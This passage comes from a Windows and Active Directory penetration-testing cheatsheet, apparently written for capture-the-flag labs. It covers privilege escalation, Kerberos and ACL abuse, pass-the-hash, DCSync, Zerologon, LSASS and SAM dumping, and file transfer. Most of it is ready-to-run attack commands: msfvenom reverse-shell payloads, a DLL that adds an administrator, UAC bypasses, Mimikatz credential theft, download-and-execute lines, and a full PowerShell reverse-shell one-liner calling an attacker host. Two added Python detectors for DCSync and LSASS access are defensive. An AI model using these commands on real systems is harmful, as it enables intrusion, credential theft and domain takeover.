msfvenom -p windows/x64/shell_reverse_tcp LHOST=$LHOST LPORT=$LPORT -f exe -o malicious.exe
copy malicious.exe "C:\Path\To\Service\binary.exe" /y
sc stop ServiceName
sc start ServiceName

:: If you can change service binary path:
sc config ServiceName binpath= "C:\Temp\shell.exe"
sc stop ServiceName && sc start ServiceName

:: Check for weak folder permissions (DLL hijacking prep)
accesschk.exe /accepteula -uwdq "C:\Program Files\"
icacls "C:\Program Files\Service\"
```

7.5 AlwaysInstallElevated

```cmd
:: Check
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
:: Both must be 0x1 for exploit

:: If enabled, create malicious MSI
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$LHOST LPORT=$LPORT -f msi -o shell.msi
msiexec /quiet /qn /i C:\Temp\shell.msi

:: PowerUp
Write-UserAddMSI   :: creates adduser.msi
```

7.6 DLL Hijacking

```cmd
:: Find missing DLLs in Process Monitor (filter: Result is NAME NOT FOUND, Path ends with .dll)
".\Process Monitor\Procmon.exe"

:: Common hijackable locations:
::   - Services running from user-writable directories
::   - Applications loading DLLs from PATH
::   - DLLs not found and searched in user-writable dirs

:: Create malicious DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$LHOST LPORT=$LPORT -f dll -o hijack.dll
copy hijack.dll "C:\Writable\Path\missing.dll"

:: C DLL template:
```

```c
#include <windows.h>

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
{
    if (fdwReason == DLL_PROCESS_ATTACH) {
        system("cmd /c net user hacker Password123! /add && net localgroup administrators hacker /add");
    }
    return TRUE;
}

// Compile: x86_64-w64-mingw32-gcc -shared -o hijack.dll hijack.c
```

7.7 Scheduled Tasks

```cmd
:: List scheduled tasks (findstr treats space-separated words as alternatives; "\|" is not supported)
schtasks /query /fo LIST /v | findstr /i "task run user"
:: PowerShell
Get-ScheduledTask | Where-Object {$_.TaskPath -notlike "\Microsoft*"} | Select-Object TaskName, TaskPath

:: Check permissions on task script/binary
icacls "C:\Scripts\task_script.ps1"
icacls "C:\Program Files\task_binary.exe"

:: If writable, replace with malicious version
copy shell.exe "C:\Scripts\task_script.exe" /y

:: Wait for task to run, or if modifiable:
schtasks /change /tn "TaskName" /ru SYSTEM /tr "C:\Temp\shell.exe"
```

7.8 Stored Credentials

```cmd
:: Windows Credential Manager
cmdkey /list
runas /savecred /user:admin "cmd /c C:\Temp\shell.exe"

:: Mimikatz (if admin → SYSTEM creds); commands below are typed at the mimikatz # prompt
.\mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
:: cleartext if wdigest enabled
sekurlsa::wdigest
:: SAM hashes
lsadump::sam
:: cached creds
lsadump::cache
:: vault creds
vault::cred /patch

:: Enable WDigest (store creds in cleartext)
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
:: Wait for user to log back in

:: DPAPI — decrypt browser saved passwords
.\mimikatz.exe dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect
```

7.9 Registry Autoruns

```cmd
:: Check autoruns
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce

:: Check if autorun binary is writable
icacls "C:\Path\To\Autorun\binary.exe"

:: If writable, replace with shell
copy shell.exe "C:\Path\To\Autorun\binary.exe" /y
:: Wait for admin to log in / reboot
```

7.10 UAC Bypass

```powershell
# Check UAC level
(Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).ConsentPromptBehaviorAdmin
# 0 = No prompt (disabled), 5 = Prompt for admin (default)

# Method 1 — fodhelper bypass (Windows 10)
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "C:\Temp\shell.exe" -Force
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden

# Method 2 — eventvwr bypass
New-Item -Path "HKCU:\Software\Classes\mscfile\shell\open\command" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\mscfile\shell\open\command" -Name "(default)" -Value "C:\Temp\shell.exe"
Start-Process "eventvwr.exe"

# Method 3 — UACME (collection of 70+ bypasses)
.\Akagi64.exe 23 C:\Temp\shell.exe

# Method 4 — RunAs with known admin creds
Start-Process cmd.exe -Credential (New-Object System.Management.Automation.PSCredential('admin', (ConvertTo-SecureString 'password' -AsPlainText -Force))) -ArgumentList '/c C:\Temp\shell.exe'
```

Phase 8 — Active Directory Attacks

8.1 NTLM Relay Attacks

```bash
# Step 1: Find hosts where SMB signing is not required (relay only works against those)
nmap --script smb2-security-mode -p 445 $IP/24

# Step 2: Setup Responder (to capture / poison)
# Edit Responder.conf: SMB = Off, HTTP = Off (for relay, not capture)
responder -I tun0 -rdwv

# Step 3: Setup ntlmrelayx
# Relay to specific target
impacket-ntlmrelayx -tf targets.txt -smb2support
impacket-ntlmrelayx -tf targets.txt -smb2support -i   # interactive shell
# Relay to get SAM dump
impacket-ntlmrelayx -t $IP -smb2support
# Relay to execute command
impacket-ntlmrelayx -t $IP -smb2support -c "whoami > C:\Temp\out.txt"
# Relay to LDAP (for AD attacks)
impacket-ntlmrelayx -t ldap://$DC --escalate-user user_to_escalate

# Step 4: Trigger NTLM auth (various methods)
#   - Access \\$LHOST from victim (social engineering, XSS)
#   - PrinterBug / SpoolSample
impacket-dfscoerce $LHOST $TARGET
python3 SpoolSample.py $TARGET $LHOST
# PetitPotam (force DC to auth)
python3 PetitPotam.py $LHOST $DC
python3 PetitPotam.py -u user -p pass -d domain.htb $LHOST $DC
```

8.2 Kerberos Delegation Attacks

```bash
# Find unconstrained delegation computers
impacket-findDelegation domain.htb/user:pass -dc-ip $IP
Get-ADComputer -Filter {TrustedForDelegation -eq $true} | Select-Object Name

# Unconstrained delegation exploitation
# When target machine has unconstrained delegation:
#   1. Get code exec on delegating computer
#   2. Wait for privileged user to connect, or force DC to auth (PrinterBug)
#   3. Dump tickets with Mimikatz/Rubeus
.\Rubeus.exe monitor /interval:5 /nowrap
python3 SpoolSample.py $DC $COMPROMISED_COMPUTER   # force DC TGT
.\Rubeus.exe ptt /ticket:BASE64_TICKET

# Constrained delegation
Get-ADUser -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo
Get-ADComputer -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo

# Exploit constrained delegation (S4U2Proxy)
.\Rubeus.exe s4u /user:svc_account /password:pass /impersonateuser:administrator /msdsspn:"http/target.domain.htb" /nowrap
.\Rubeus.exe s4u /user:svc_account /rc4:NTLM_HASH /impersonateuser:administrator /msdsspn:"cifs/target.domain.htb" /ptt

# Resource-Based Constrained Delegation (RBCD)
# If you can write msDS-AllowedToActOnBehalfOfOtherIdentity on a computer:
# 1. Create a machine account (or use existing with SPN)
impacket-addcomputer domain.htb/user:pass -computer-name 'ATTACKER$' -computer-pass 'Pass123!'
# 2. Configure RBCD
python3 rbcd.py -f ATTACKER -t TARGET -dc-ip $DC domain.htb/user:pass
# 3. Get ticket
impacket-getST -spn 'cifs/target.domain.htb' -impersonate administrator -dc-ip $DC domain.htb/'ATTACKER$':'Pass123!'
# 4. Use ticket
export KRB5CCNAME=administrator.ccache
impacket-psexec -k -no-pass domain.htb/administrator@target.domain.htb
```

8.3 ACL / ACE Abuse

```powershell
# Find interesting ACLs with BloodHound (primary method)
# Look for: GenericAll, GenericWrite, WriteOwner, WriteDACL, ForceChangePassword, AddMember

# Or with PowerView
IEX(New-Object Net.WebClient).DownloadString('http://$LHOST/PowerView.ps1')
Find-InterestingDomainAcl -ResolveGUIDs | Where-Object {$_.IdentityReferenceName -match "compromised_user"}

# GenericAll on User — force password reset
Set-DomainUserPassword -Identity target_user -AccountPassword (ConvertTo-SecureString 'NewPass123!' -AsPlainText -Force) -Verbose
net user target_user NewPass123! /domain

# GenericAll on Group — add member
Add-DomainGroupMember -Identity "Domain Admins" -Members compromised_user
net group "Domain Admins" compromised_user /add /domain

# GenericWrite on User — targeted Kerberoast or logon script
Set-DomainObject -Identity target_user -Set @{'serviceprincipalname'='fake/spn'}   # add SPN → Kerberoast
Set-DomainObject -Identity target_user -Set @{'scriptpath'='\\$LHOST\share\malicious.bat'}

# WriteOwner — take ownership, then full control
Set-DomainObjectOwner -Identity target -OwnerIdentity compromised_user
Add-DomainObjectAcl -TargetIdentity target -PrincipalIdentity compromised_user -Rights All

# WriteDACL — add DCSync rights
Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=htb" -PrincipalIdentity compromised_user -Rights DCSync

# ForceChangePassword
Set-DomainUserPassword -Identity target -AccountPassword (ConvertTo-SecureString 'NewPass!' -AsPlainText -Force)

# Impacket tools for ACL abuse (run from Kali)
impacket-owneredit -action write -new-owner compromised_user -target target_object domain.htb/compromised_user:pass -dc-ip $DC
impacket-dacledit -action write -rights FullControl -principal compromised_user -target target_object domain.htb/compromised_user:pass -dc-ip $DC
```

8.4 Pass-the-Hash (PtH)

bash
# CrackMapExec
crackmapexec smb $IP -u administrator -H 'NTLM_HASH'
crackmapexec smb $IP/24 -u administrator -H 'NTLM_HASH' --continue-on-success   # spray subnet
crackmapexec smb $IP -u administrator -H 'NTLM_HASH' -x "whoami"
crackmapexec winrm $IP -u administrator -H 'NTLM_HASH'

# Evil-WinRM
evil-winrm -i $IP -u administrator -H 'NTLM_HASH'

# Impacket tools
impacket-psexec -hashes :NTLM_HASH administrator@$IP
impacket-smbexec -hashes :NTLM_HASH administrator@$IP
impacket-wmiexec -hashes :NTLM_HASH administrator@$IP
impacket-atexec -hashes :NTLM_HASH administrator@$IP cmd.exe "whoami"

# xfreerdp PtH
xfreerdp /v:$IP /u:administrator /pth:NTLM_HASH /d:domain.htb /cert:ignore

8.5 Pass-the-Ticket (PtT)

bash
# Get a TGT or TGS
.\Rubeus.exe tgtdeleg /nowrap   # use current TGT
.\Rubeus.exe asktgt /user:user /rc4:HASH /domain:domain.htb /ptt
.\Rubeus.exe asktgs /service:cifs/target /ticket:BASE64 /ptt

# Import ticket with Mimikatz
.\mimikatz.exe kerberos::ptt ticket.kirbi

# Impacket — use ticket
export KRB5CCNAME=/path/to/ticket.ccache
impacket-psexec -k -no-pass domain.htb/user@target.domain.htb
impacket-smbclient -k -no-pass domain.htb/user@target.domain.htb

# Convert ticket formats (kirbi ↔ ccache)
impacket-ticketConverter ticket.kirbi ticket.ccache
impacket-ticketConverter ticket.ccache ticket.kirbi

8.6 Overpass-the-Hash / Pass-the-Key

bash
# Overpass-the-hash: use NTLM hash to get Kerberos ticket
.\Rubeus.exe asktgt /user:user /rc4:NTLM_HASH /domain:domain.htb /ptt
.\Rubeus.exe asktgt /user:user /aes256:AES256_KEY /domain:domain.htb /ptt /opsec

# Mimikatz
.\mimikatz.exe sekurlsa::pth /user:user /domain:domain.htb /ntlm:NTLM_HASH /run:cmd.exe

# Impacket — get TGT
impacket-getTGT domain.htb/user -hashes :NTLM_HASH -dc-ip $DC
impacket-getTGT domain.htb/user -aesKey AES256_KEY -dc-ip $DC
export KRB5CCNAME=user.ccache

8.7 Golden Ticket

bash
# Requirements: krbtgt hash, domain SID

# Get krbtgt hash (after DCSync or DC compromise)
impacket-secretsdump domain.htb/administrator:pass@$DC
# or:
.\mimikatz.exe "lsadump::dcsync /domain:domain.htb /user:krbtgt" exit

# Get domain SID
impacket-lookupsid domain.htb/user:pass@$DC | grep "Domain SID"
# or (from Windows):
wmic useraccount get name,sid

# Forge Golden Ticket with Impacket
impacket-ticketer -nthash KRBTGT_NTLM_HASH -domain-sid S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX -domain domain.htb administrator

# Use the ticket
export KRB5CCNAME=administrator.ccache
impacket-psexec -k -no-pass domain.htb/administrator@$DC

# Forge with Mimikatz (from Windows)
.\mimikatz.exe kerberos::golden /domain:domain.htb /sid:S-1-5-21-... /rc4:KRBTGT_HASH /user:administrator /ticket:golden.kirbi
kerberos::ptt golden.kirbi

8.8 Silver Ticket

bash
# Requirements: target service account hash, domain SID, SPN

# Forge Silver Ticket (CIFS service)
impacket-ticketer -nthash SERVICE_NTLM_HASH -domain-sid S-1-5-21-XXXXXXXXXX -domain domain.htb -spn cifs/target.domain.htb administrator

# Common SPNs for silver tickets
# cifs/target.domain.htb  → file access (SMB)
# http/target.domain.htb  → web access
# mssql/target.domain.htb → SQL Server access
# host/target.domain.htb  → WMI, remote access

# Use
export KRB5CCNAME=administrator.ccache
impacket-smbclient -k -no-pass domain.htb/administrator@target.domain.htb

# Mimikatz silver ticket
.\mimikatz.exe kerberos::golden /domain:domain.htb /sid:S-1-5-21-... /rc4:SERVICE_HASH /user:administrator /service:cifs /target:target.domain.htb /ticket:silver.kirbi
kerberos::ptt silver.kirbi

Phase 9 — Lateral Movement

9.1 PsExec / Impacket Execution

bash
# Impacket psexec (creates service, gets SYSTEM)
impacket-psexec administrator:password@$IP
impacket-psexec -hashes :NTLM_HASH administrator@$IP
impacket-psexec -k -no-pass domain.htb/administrator@$IP   # Kerberos

# smbexec (uses service, no upload)
impacket-smbexec administrator:password@$IP
impacket-smbexec -hashes :NTLM_HASH administrator@$IP

# wmiexec (WMI — less noisy)
impacket-wmiexec administrator:password@$IP
impacket-wmiexec -hashes :NTLM_HASH administrator@$IP
impacket-wmiexec -k -no-pass domain.htb/administrator@$IP

# atexec (scheduled task execution)
impacket-atexec administrator:password@$IP "whoami"
impacket-atexec -hashes :NTLM_HASH administrator@$IP "cmd /c whoami > C:\Temp\out.txt"

# CrackMapExec execution
crackmapexec smb $IP -u admin -p pass -x "whoami"   # cmd
crackmapexec smb $IP -u admin -p pass -X "whoami"   # PowerShell
crackmapexec smb $IP -u admin -p pass --exec-method smbexec -x "whoami"

9.2 Sysinternals PsExec

cmd
:: Windows PsExec
PsExec.exe \\target -u administrator -p password cmd.exe
:: as SYSTEM
PsExec.exe \\target -u domain\admin -p password -s cmd.exe

:: Pass credentials
net use \\target\ipc$ "password" /u:domain\user
PsExec.exe \\target cmd.exe

9.3 WMI Lateral Movement

powershell
# From Windows — WMI exec
Invoke-WmiMethod -ComputerName target -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c whoami > C:\out.txt"
$cred = Get-Credential
Invoke-WmiMethod -ComputerName target -Credential $cred -Class Win32_Process -Name Create -ArgumentList "C:\Temp\shell.exe"

# wmic
wmic /node:$IP /user:domain\admin /password:pass process call create "cmd /c whoami > C:\Temp\out.txt"

9.4 Pass-the-Hash with Mimikatz

cmd
:: Mimikatz sekurlsa::pth — spawn process with different creds
.\mimikatz.exe sekurlsa::pth /user:administrator /domain:domain.htb /ntlm:NTLM_HASH /run:"cmd.exe"
:: New cmd window opens — connected as administrator via PtH

Phase 10 — Domain Compromise & DCSync

10.1 DCSync Attack

bash
# Requires: Domain Admin, DA-equivalent, or DCSync rights (GetChangesAll + GetChanges)

# Impacket secretsdump — remote DCSync
impacket-secretsdump domain.htb/administrator:pass@$DC
impacket-secretsdump -hashes :NTLM_HASH domain.htb/administrator@$DC
impacket-secretsdump -just-dc domain.htb/administrator:pass@$DC                # only DC
impacket-secretsdump -just-dc-user krbtgt domain.htb/administrator:pass@$DC    # krbtgt only

# Mimikatz DCSync (from Windows with DA)
.\mimikatz.exe lsadump::dcsync /domain:domain.htb /all /csv
lsadump::dcsync /domain:domain.htb /user:administrator
lsadump::dcsync /domain:domain.htb /user:krbtgt

# CrackMapExec DCSync
crackmapexec smb $DC -u administrator -p pass --ntds
crackmapexec smb $DC -u administrator -H NTLM_HASH --ntds
crackmapexec smb $DC -u administrator -p pass --ntds --users
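From the blue side, every tool above makes the same request: a replication call that needs the GetChanges / GetChangesAll control-access rights, which a domain controller records as Event ID 4662 with the rights' GUIDs in the Properties field. The detection below is an added example written for this page (not a script from the cheatsheet); it parses a few constructed 4662 records and flags any replication request whose subject is not a known replicator, DC computer account names and the allowlist being hypothetical.

```python
import re
from typing import Dict, List, Set

# Control-access rights a DCSync caller must hold (real AD schema GUIDs).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Principals expected to replicate: the DC computer accounts plus approved sync
# services (hypothetical names). A trailing '$' alone proves nothing, since an
# attacker-created machine account (impacket-addcomputer above) has one too.
KNOWN_REPLICATORS = {"DC01$", "DC02$", "MSOL_SYNC"}

GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)

# Constructed 4662/4624 records flattened to key=value text (not real log data).
SAMPLE_EVENTS = [
    "EventID=4662 SubjectUserName=DC01$ SubjectDomainName=DOMAIN AccessMask=0x100 "
    "Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662 SubjectUserName=jdoe SubjectDomainName=DOMAIN AccessMask=0x100 "
    "Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662 SubjectUserName=jdoe SubjectDomainName=DOMAIN AccessMask=0x10 "
    "Properties={bf967aba-0de6-11d0-a285-00aa003049e2}",   # 'user' class: ordinary read
    "EventID=4624 SubjectUserName=jdoe SubjectDomainName=DOMAIN LogonType=3",
    "EventID=4662 SubjectUserName=WS01$ SubjectDomainName=DOMAIN AccessMask=0x100 "
    "Properties={1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
]


def parse_event(line: str) -> Dict[str, object]:
    """Split a flattened record into its fields and collect every GUID it mentions."""
    event: Dict[str, object] = dict(re.findall(r"(\w+)=(\S+)", line))
    event["guids"] = {g.lower() for g in GUID_RE.findall(line)}
    return event


def replication_rights(event: Dict[str, object]) -> Set[str]:
    """Names of the replication rights exercised by a 4662 event (empty if none)."""
    if event.get("EventID") != "4662":
        return set()
    return {REPLICATION_RIGHTS[g] for g in event["guids"] if g in REPLICATION_RIGHTS}


def find_dcsync_events(lines: List[str]) -> List[Dict[str, object]]:
    """Flag replication-right 4662 events whose subject is not a known replicator."""
    hits = []
    for line in lines:
        event = parse_event(line)
        rights = replication_rights(event)
        subject = str(event.get("SubjectUserName", ""))
        if rights and subject.upper() not in KNOWN_REPLICATORS:
            hits.append({"subject": subject, "rights": sorted(rights)})
    return hits


if __name__ == "__main__":
    for hit in find_dcsync_events(SAMPLE_EVENTS):
        print(f"possible DCSync by {hit['subject']}: {', '.join(hit['rights'])}")
```

Auditing 4662 this way requires the "Directory Service Access" subcategory to be enabled and a SACL on the domain head that audits those control-access rights; without that the event is never written.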

10.2 NTDS.dit Extraction

bash
# Shadow copy method (from Windows)
vssadmin create shadow /for=C:
cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Temp\NTDS.dit
cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Temp\SYSTEM

# Or with CrackMapExec / ntdsutil
crackmapexec smb $DC -u admin -p pass --ntds vss   # via VSS

# Dump with ntdsutil
ntdsutil "activate instance ntds" "ifm" "create full C:\Temp\IFM" quit quit
# Copy C:\Temp\IFM\Active Directory\ntds.dit and SYSTEM hive

# Parse NTDS.dit on Kali
impacket-secretsdump -ntds NTDS.dit -system SYSTEM LOCAL
impacket-secretsdump -ntds NTDS.dit -system SYSTEM LOCAL -outputfile hashes.txt

10.3 Zerologon (CVE-2020-1472)

bash
# Check vulnerability
python3 zerologon_tester.py NETBIOS_NAME $DC

# Exploit (sets DC computer account password to empty)
python3 cve-2020-1472-exploit.py NETBIOS_NAME $DC

# DCSync with empty password
impacket-secretsdump -just-dc -no-pass domain.htb/NETBIOS_NAME\$@$DC

# IMPORTANT: Restore DC password after exploitation!
impacket-reinstall_original_pw NETBIOS_NAME $DC hex_original_password

Phase 11 — Credential Dumping & Loot

11.1 LSASS Dump

bash
# Task Manager GUI (if RDP access)
# Right-click lsass.exe → Create Dump File

# ProcDump (Sysinternals — less AV detection)
.\procdump.exe -ma lsass.exe C:\Temp\lsass.dmp
.\procdump.exe -ma -r lsass.exe C:\Temp\lsass.dmp   # reflective (AV bypass)

# Comsvcs.dll method
C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID C:\Temp\lsass.dmp full

# From PowerShell
$process = Get-Process lsass
[System.Runtime.InteropServices.Marshal]::WriteInt32([System.Runtime.InteropServices.Marshal]::AllocHGlobal(4), $process.Id)
# The two lines above only copy the PID into unmanaged memory and do not dump anything;
# use one of the tool-based approaches instead

# Mimikatz direct LSASS (needs debug privilege)
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
.\mimikatz.exe "privilege::debug" "sekurlsa::wdigest" exit   # cleartext
.\mimikatz.exe "privilege::debug" "sekurlsa::tickets" exit   # Kerberos

# Parse dump offline on Kali with pypykatz
pip3 install pypykatz
pypykatz lsa minidump lsass.dmp
pypykatz lsa minidump lsass.dmp | tee parsed_lsass.txt
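Whatever the dumping method, the process that does it has to open lsass.exe with memory-read access, and Sysmon Event ID 10 (ProcessAccess) records exactly that: SourceImage, TargetImage and GrantedAccess. The detection below is an added example for this page, not part of the cheatsheet; it keys on the PROCESS_VM_READ bit rather than on a list of exact masks, and runs over constructed records with a hypothetical allowlist of legitimate readers.

```python
import re
from typing import Dict, List

# Win32 process access right (real value). MiniDumpWriteDump needs PROCESS_VM_READ
# (plus PROCESS_QUERY_INFORMATION), so that bit is what the check keys on; a mask
# such as 0x1000 (PROCESS_QUERY_LIMITED_INFORMATION only) cannot read memory.
PROCESS_VM_READ = 0x0010

# Processes that legitimately open lsass with read access on this (hypothetical)
# build; tune against your own baseline (EDR/AV agents, csrss, wininit, ...).
ALLOWED_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
}

# Constructed Sysmon Event ID 10 records, flattened to key=value text; not real logs.
SAMPLE_EVENTS = [
    r"EventID=10 SourceImage=C:\Windows\System32\csrss.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1FFFFF",
    r"EventID=10 SourceImage=C:\Temp\procdump.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1FFFFF",
    r"EventID=10 SourceImage=C:\Windows\System32\rundll32.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1410",
    r"EventID=10 SourceImage=C:\Users\u\tool.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1000",
    r"EventID=10 SourceImage=C:\Temp\procdump.exe TargetImage=C:\Windows\System32\svchost.exe GrantedAccess=0x1FFFFF",
]


def parse_event(line: str) -> Dict[str, str]:
    """Split a flattened record into key=value fields (sample paths contain no spaces)."""
    return dict(re.findall(r"(\w+)=(\S+)", line))


def is_lsass_read(event: Dict[str, str]) -> bool:
    """True when a process opened lsass.exe with memory-read access."""
    if event.get("EventID") != "10":
        return False
    target = event.get("TargetImage", "").lower()
    granted = int(event.get("GrantedAccess", "0"), 16)
    return target.endswith(r"\lsass.exe") and bool(granted & PROCESS_VM_READ)


def flag_lsass_access(lines: List[str]) -> List[Dict[str, object]]:
    """Return lsass memory reads whose source is outside the allowlist."""
    hits = []
    for line in lines:
        event = parse_event(line)
        if not is_lsass_read(event) or event["SourceImage"].lower() in ALLOWED_SOURCES:
            continue
        hits.append({"source": event["SourceImage"],
                     "granted_access": int(event["GrantedAccess"], 16)})
    return hits


if __name__ == "__main__":
    for hit in flag_lsass_access(SAMPLE_EVENTS):
        print(f"lsass opened with VM_READ by {hit['source']} (0x{hit['granted_access']:X})")
```

The rundll32 record mirrors the comsvcs.dll MiniDump method above: the access mask differs from ProcDump's, but the VM_READ bit is present in both, which is why the check does not enumerate masks.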

11.2 SAM / Registry Hives

cmd
:: Export registry hives
reg save HKLM\SAM C:\Temp\SAM
reg save HKLM\SYSTEM C:\Temp\SYSTEM
reg save HKLM\SECURITY C:\Temp\SECURITY

:: Parse on Kali
impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL

:: With CrackMapExec
crackmapexec smb $IP -u admin -p pass --sam
:: LSA secrets
crackmapexec smb $IP -u admin -p pass --lsa

11.3 Mimikatz Full Reference

cmd
:: Privilege
privilege::debug

:: LSASS / logon passwords
sekurlsa::logonpasswords
sekurlsa::wdigest
sekurlsa::kerberos
sekurlsa::tspkg
sekurlsa::msv
sekurlsa::livessp
sekurlsa::ssp

:: Kerberos tickets
sekurlsa::tickets
sekurlsa::tickets /export
kerberos::list
kerberos::list /export
kerberos::purge
kerberos::ptt ticket.kirbi

:: Golden / Silver (a silver ticket uses the same golden module with /service and /target)
kerberos::golden /domain:domain.htb /sid:S-1-5-21-... /rc4:KRBTGT_HASH /user:administrator /ticket:golden.kirbi
kerberos::golden /domain:domain.htb /sid:S-1-5-21-... /rc4:SERVICE_HASH /user:administrator /service:cifs /target:host.domain.htb /ticket:silver.kirbi

:: SAM / LSA
lsadump::sam
lsadump::lsa /patch
lsadump::secrets
lsadump::cache

:: DCSync
lsadump::dcsync /domain:domain.htb /user:krbtgt
lsadump::dcsync /domain:domain.htb /all /csv

:: DPAPI
:: masterkeys
sekurlsa::dpapi
dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect
dpapi::cred /in:"credential_file"

:: Token manipulation
token::list
token::elevate
token::elevate /domainadmin
token::revert

11.4 Hash Cracking

bash
# Identify hash type
hash-identifier <hash>
hashid <hash>

# Hashcat modes
hashcat -m 1000  ntlm.txt        /usr/share/wordlists/rockyou.txt   # NTLM
hashcat -m 3000  lm.txt          /usr/share/wordlists/rockyou.txt   # LM
hashcat -m 5600  netntlmv2.txt   /usr/share/wordlists/rockyou.txt   # NTLMv2
hashcat -m 13100 kerberoast.txt  /usr/share/wordlists/rockyou.txt   # Kerberoast (TGS-REP)
hashcat -m 18200 asrep.txt       /usr/share/wordlists/rockyou.txt   # AS-REP
hashcat -m 1800  sha512crypt.txt /usr/share/wordlists/rockyou.txt   # sha512crypt
hashcat -m 500   md5crypt.txt    /usr/share/wordlists/rockyou.txt   # md5crypt

# Rules
hashcat -m 1000 ntlm.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule
hashcat -m 1000 ntlm.txt rockyou.txt -r /usr/share/hashcat/rules/d3ad0ne.rule

# John
john ntlm.txt --format=NT --wordlist=/usr/share/wordlists/rockyou.txt
john kerberoast.txt --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt
john asrep.txt --format=krb5asrep --wordlist=/usr/share/wordlists/rockyou.txt
john --show ntlm.txt

11.5 Flags

cmd
:: User flag
type C:\Users\user\Desktop\user.txt
dir /s /b user.txt 2>nul

:: Root / Admin flag
type C:\Users\Administrator\Desktop\root.txt
type C:\Administrator\Desktop\root.txt
dir /s /b root.txt 2>nul

File Transfer Techniques

From Kali → Windows

bash
# Python HTTP server
python3 -m http.server 80

# PowerShell download
powershell -c "(New-Object Net.WebClient).DownloadFile('http://$LHOST/file.exe','C:\Temp\file.exe')"
powershell -c "IWR http://$LHOST/file.exe -OutFile C:\Temp\file.exe"
powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://$LHOST/script.ps1')"

# Certutil
certutil.exe -urlcache -split -f http://$LHOST/file.exe C:\Temp\file.exe
certutil.exe -decode encoded.b64 file.exe

# Bitsadmin
bitsadmin /transfer job /download /priority high http://$LHOST/file.exe C:\Temp\file.exe

# SMB server
impacket-smbserver share . -smb2support
# On Windows:
copy \\$LHOST\share\file.exe C:\Temp\file.exe
net use Z: \\$LHOST\share

From Windows → Kali

bash
# SMB upload
impacket-smbserver share . -smb2support -username user -password pass
# On Windows:
net use Z: \\$LHOST\share /user:user pass
copy file.txt Z:\

cmd
:: PowerShell upload via POST
Invoke-WebRequest -Uri "http://$LHOST/upload" -Method POST -Body (Get-Content -Raw -Path C:\file.txt)

:: Certutil base64 encode
certutil.exe -encode C:\file.exe encoded.b64
:: Copy base64 text, decode on Kali: base64 -d encoded.b64 > file.exe

:: SMB (from Windows after net use)
copy C:\Temp\lsass.dmp Z:\

Shells & Listeners

Windows Reverse Shells

powershell
# PowerShell reverse shell (one-liner)
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('$LHOST',$LPORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

# ConPtyShell (fully interactive PowerShell — best option)
# On Kali:
stty raw -echo; (stty size; cat) | nc -lvnp $LPORT
# On Windows:
IEX(New-Object Net.WebClient).DownloadString('http://$LHOST/Invoke-ConPtyShell.ps1')
Invoke-ConPtyShell $LHOST $LPORT

